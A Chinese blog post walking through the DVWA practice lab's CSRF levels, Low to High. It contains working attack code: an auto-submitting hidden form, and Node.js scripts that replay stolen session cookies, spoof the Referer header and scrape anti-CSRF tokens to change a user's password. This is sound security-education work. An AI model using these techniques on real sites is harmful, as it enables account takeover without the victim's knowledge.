網絡安全入門之跨站請求僞造 DVWA CSRF Low to High

原創 Curren.wong 2020-07-06 12:29

文章目錄

1. 背景

最近需要補充一下網絡安全方面的知識,於是就從基礎的靶場 DVWA (Damn Vulnerable Web Application) 開始刷起,這一篇是關於從LowHigh難度的跨站請求僞造的內容。

和我一樣希望學習網絡安全知識的同學,推薦學習《Web安全攻防實戰》《安全攻防技能30講》

2. 環境搭建

參考上一篇關於 Brute Force 暴力破解密碼的博客

3. 跨站請求僞造

我們需要在用戶不知情的情況下改掉用戶的密碼。

3.1. Low

Figure 1. CSRF \text{Figure 1. CSRF}

先看源碼,Low難度沒有設置任何請求來源的校驗。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

只需要讓他人點擊下面的鏈接,密碼就修改成功了。

http://9710fc76520cf9b2ff5ea67e0af9e0df.n1.vsgo.cloud:7147/web/vulnerabilities/csrf/?password_new=hackerPassword&password_conf=hackerPassword&Change=Change#

不過這個鏈接太明顯了,我們也可以構造一個頁面放在自己的服務器上。

<!-- index.html -->
<!DOCTYPE html>
<html lang="zh">

    <head>
        <meta charset="UTF-8"> <!-- for HTML5 -->
        <style>
            div {
                text-align: center;
            }

        </style>
    </head>

    <body>
        <div>
            <p>
                頁面跳轉中,請稍候。。。
            </p>

            <style>
                form {
                    display: none;
                }

            </style>
            <form action="http://9710fc76520cf9b2ff5ea67e0af9e0df.n1.vsgo.cloud:7147/web/vulnerabilities/csrf/"
                method="GET">
                New password:<br />
                <input type="password" AUTOCOMPLETE="off" name="password_new" value="hackerPassword"><br />
                Confirm new password:<br />
                <input type="password" AUTOCOMPLETE="off" name="password_conf" value="hackerPassword"><br />
                <br />
                <input type="submit" id="button" name="Change" value="Change" />
            </form>
            <script>
                document.getElementById("button").click();

            </script>
        </div>
    </body>

</html>

點擊以後就會發送請求改變用戶的密碼。

Figure 2. Low \text{Figure 2. Low}

3.2. Medium

接下來是Medium難度,先看源碼。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

這裏加入了一個來源的校驗,我們可以看一看這段代碼的含義

// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

stripos函數:

stripos ( string $haystack , string $needle [, int $offset = 0 ] ) : int

返回在字符串 haystackneedle 首次出現的數字位置。

  • $_SERVER 是一個包含了諸如頭信息(header)路徑(path)、以及腳本位置(script locations)等等信息的數組。這個數組中的項目由 Web 服務器創建。

  • HTTP_REFERER:引導用戶代理到當前頁的前一頁的地址(如果存在)。由 user agent 設置決定。並不是所有的用戶代理都會設置該項,有的還提供了修改 HTTP_REFERER 的功能。簡言之,該值並不可信。

  • SERVER_NAME:當前運行腳本所在的服務器的主機名。如果腳本運行於虛擬主機中,該名稱是由那個虛擬主機所設置的值決定。

HTTP_REFERER不能通過jQuery請求僞造發送。

Figure 3. Set Header \text{Figure 3. Set Header}

使用Ajax發送請求還會遇到跨域問題。

Figure 4. CORS \text{Figure 4. CORS}

也就是說,使用前端僞造請求可能會遇到各種障礙,我們就考慮用服務端來僞造請求。而使用服務端的話,我們就需要利用別的漏洞來竊取到用戶的Cookie

這裏我們使用DOM XSS來竊取用戶的Cookie,詳情參考 網絡安全入門之跨站腳本攻擊 DVWA XSS DOM Low to High 這一篇博客。

那麼假設我們現在已經竊取到了用戶的Cookie

"security=medium; PHPSESSID=8jkvdfa07u9jgornta8862b9d0"

在服務端使用Node.jsrequest組件發送HTTP請求。

var request = require('request');
    const options = {
        url: 'http://9710fc76520cf9b2ff5ea67e0af9e0df.n1.vsgo.cloud:7147/web/vulnerabilities/csrf/?password_new=hackerPassword&password_conf=hackerPassword&Change=Change#',
        method: "GET",
        headers: {
            "Content-Type": "text/html;charset=utf-8",
            Referer: "http://9710fc76520cf9b2ff5ea67e0af9e0df.n2.vsgo.cloud",
            Cookie: "security=medium; PHPSESSID=8jkvdfa07u9jgornta8862b9d0"
        }
    };

function callback(error, response, body) {
    if (!error && response.statusCode == 200) {
        console.log("Success") // 請求成功的處理邏輯
        console.log(body) // 請求成功的處理邏輯
        console.log(typeof(body))
    } else {
        console.log("Error") // 請求失敗的處理邏輯
        console.log(error) // 請求失敗的處理邏輯
    }
}

var res = request(options, callback);

從返回的HTML中我們也可以看到,密碼已經成功被我們修改了。


Figure 5. Medium \text{Figure 5. Medium}

3.3. High

High難度加入了Anti-CSRF token

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

不過這裏有一個漏洞,就是token存在了前端代碼中,這又給了我們竊取token的機會。

Figure 6. Token \text{Figure 6. Token}

同樣先拿到Cookie

"security=high; PHPSESSID=f3klut5ds454k782h5ea0prol5"

使用Node.js先發送一次請求,拿到token,然後把token加入到GET請求中,再發送一次請求。

const cheerio = require('cheerio')
const request = require('request');
var $;
var tokenThis;

var options = {
    url: 'http://9710fc76520cf9b2ff5ea67e0af9e0df.n1.vsgo.cloud:7147/web/vulnerabilities/csrf/',
    method: "GET",
    headers: {
        "Content-Type": "text/html;charset=utf-8",
        Referer: "http://9710fc76520cf9b2ff5ea67e0af9e0df.n2.vsgo.cloud",
        Cookie: "security=high; PHPSESSID=f3klut5ds454k782h5ea0prol5"
    }
};

function callback(error, response, body) {
    if (!error && response.statusCode == 200) {
        console.log("Success") // 請求成功的處理邏輯
        // 獲取html對象
        $ = cheerio.load(JSON.stringify(body))
        // 獲取token
        tokenThis = $('input[name="user_token"]').attr('value');
        console.log(body) // 請求成功的處理邏輯
    } else {
        console.log("Error") // 請求失敗的處理邏輯
        console.log(error) // 請求失敗的處理邏輯
    }
}

// 設置第二次請求的參數
function setOpt() {
    var options2 = {
        url: 'http://9710fc76520cf9b2ff5ea67e0af9e0df.n1.vsgo.cloud:7147/web/vulnerabilities/csrf/?password_new=hackerPassword&password_conf=hackerPassword&Change=Change&user_token=' +
            tokenThis,
        method: "GET",
        headers: {
            "Content-Type": "text/html;charset=utf-8",
            Referer: "http://9710fc76520cf9b2ff5ea67e0af9e0df.n2.vsgo.cloud",
            Cookie: "security=high; PHPSESSID=f3klut5ds454k782h5ea0prol5"
        }
    }
    return options2
};

// Node.js是異步的,我們這裏需要同步執行所以用到了Promise和then
fn = ()=>{return new Promise(
        (resovle, reject) => {
            var res = resovle;
            request(options, (error, response, body) => {
                callback(error, response, body);
                res()});
        }
    )
}
// 同步
fn().then(
    () => {
        request(setOpt(), callback);
    }
)

修改成功。

Figure 7. High \text{Figure 7. High}

3.3. Impossible

Impossible難度加入了原密碼的校驗,在不知道原密碼的情況下無法對密碼進行修改,這樣是比較安全的。

Figure 8. Impossible \text{Figure 8. Impossible} 

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

聯繫郵箱[email protected]

CSDNhttps://me.csdn.net/qq_41729780

知乎https://zhuanlan.zhihu.com/c_1225417532351741952

公衆號複雜網絡與機器學習

歡迎關注/轉載,有問題歡迎通過郵箱交流。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

工信部爲“新基建”安全加把“鎖”

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! 8月3日,工業和信息化部發布通知,要求開展2020年網絡安全技術應用試點示範工作。按照通知,2020年網絡安全技術應用試點示範選取的重點方向

雲棲號資訊小哥 2020-08-04 13:13:52

企業的數字化轉型如何面對網絡安全問題

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! 網絡安全是公司進步和數字化轉型的較大障礙之一。自然,隨着新技術的出現,新的漏洞將使公司難以駕馭,尤其是在新的雲環境中。從法律上講,網絡安全設

雲棲號資訊小哥 2020-07-30 14:16:49

網絡安全的未來是否掌握在 AI 手中(三)

雲棲號資訊:【點擊查看更多行業資訊】在這裏您可以找到不同行業的第一手的上雲資訊,還在等什麼,快來! AI 提升網絡防禦系統安全級別 可能的網絡防禦系統應該至少提供三個級別的網絡安全。 第一級別包括傳統的靜態網絡防禦機制,如身份認證、密碼保護

雲棲號資訊小哥 2020-07-14 14:55:57

免責聲明,告知

本欄內容只供學習使用,如有違反法律,與本人無關。 在下載後24小時後,請及時刪除。 對可能危及普通公衆權益與自由的漏洞或技術運用或發佈應保持謹慎。 不應違背保護信息自由流動的底線。 請尊重版權信息,購買正版。 如本博客裏有錯誤出現,請

zhangguangyi888 2020-07-08 11:39:41

等保測評--通信網絡安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

等保測評--物理環境安全測評要求

信息安全等級保護,是對信息和信息載體按照重要性等級分級別進行保護的一種工作,在中國、美國等很多國家都存在的一種信息安全領域的工作。在中國,信息安全等級保護廣義上爲涉及到該工作的標準、產品、系統、信息等均依據等級保護思想的安全工作;狹義上一

江南落花雨 2020-07-08 07:12:19

【公益譯文】網絡安全滑動標尺模型–SANS分析師白皮書

http://blog.nsfocus.net/sliding-scale-cyber-security/

云上笛暮 2020-07-08 06:09:02

2020年全球風險報告

原文:https://www.marsh.com/cn/zh/insights/research/global-risks-report-2020.html

云上笛暮 2020-07-08 06:09:01

超初級的Linux後門製作方法

一個文件都有一個所有者,表示該文件是誰創建的。同時,該文件還有一個組編號,表示該文件所屬的組,一般爲文件所有者所屬的組.   如果是一個可執行文件,那

opl001 2020-07-08 01:57:42

【趣話編程】如果張東昇是個程序員

簡介:趣話編程第五期,今天讓我們來講一講“隱祕的角落”之程序員版張東昇。原文鏈接張東昇是一家互聯網公司的程序員,一直以來都勤勤懇懇老實工作。可最近一段時間,老闆接了幾個項目回來,不但開啓了996的工作模式,更要命的是頻頻更改需求,

阿里技术官方号 2020-07-08 00:43:28

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

基於PU-Learning的惡意URL檢測

基於PU-Learning的惡意URL檢測 原文作者:Ya-Lin Zhang, Longfei Li, Jun Zhou, Xiaolong Li, Yujiang Liu, Yuanchao Zhang, Zhi-Hua Zh

Ronnyz 2020-07-07 20:13:37

解決在Windows server2003虛擬機上無法安裝IIS組件的問題

解決在Windows server2003虛擬機上無法安裝IIS組件的問題   最近在研究網絡方面的知識,於是找了幾個測試網站源碼,打算自己搭一個測試平臺,練一練手。找到有網站 漏洞的源碼後,用PHPstudy作爲網站服務器平臺用的不太熟

running boy 2020-07-07 12:42:34

SQL注入關鍵詞大全

高級搜索關鍵詞 sql 注入大全 拿起你手中的 啊D 明小子 pangolin  激情把 inurl:asp?id= inurl:Article_Print.asp? inurl:EnCompHonorBig.asp?id=隨便加個數

running boy 2020-07-07 12:42:31

Netcat安裝使用詳解

Netcat 從網絡的一段讀取數據,輸出到網絡的另一端(可以使用於TCP和UDP協議)   安裝 Windows可自行在github上下載netcat kali linux上 方法一: sudo yum install n

想冲大厂的癞蛤蟆 2020-07-07 11:59:33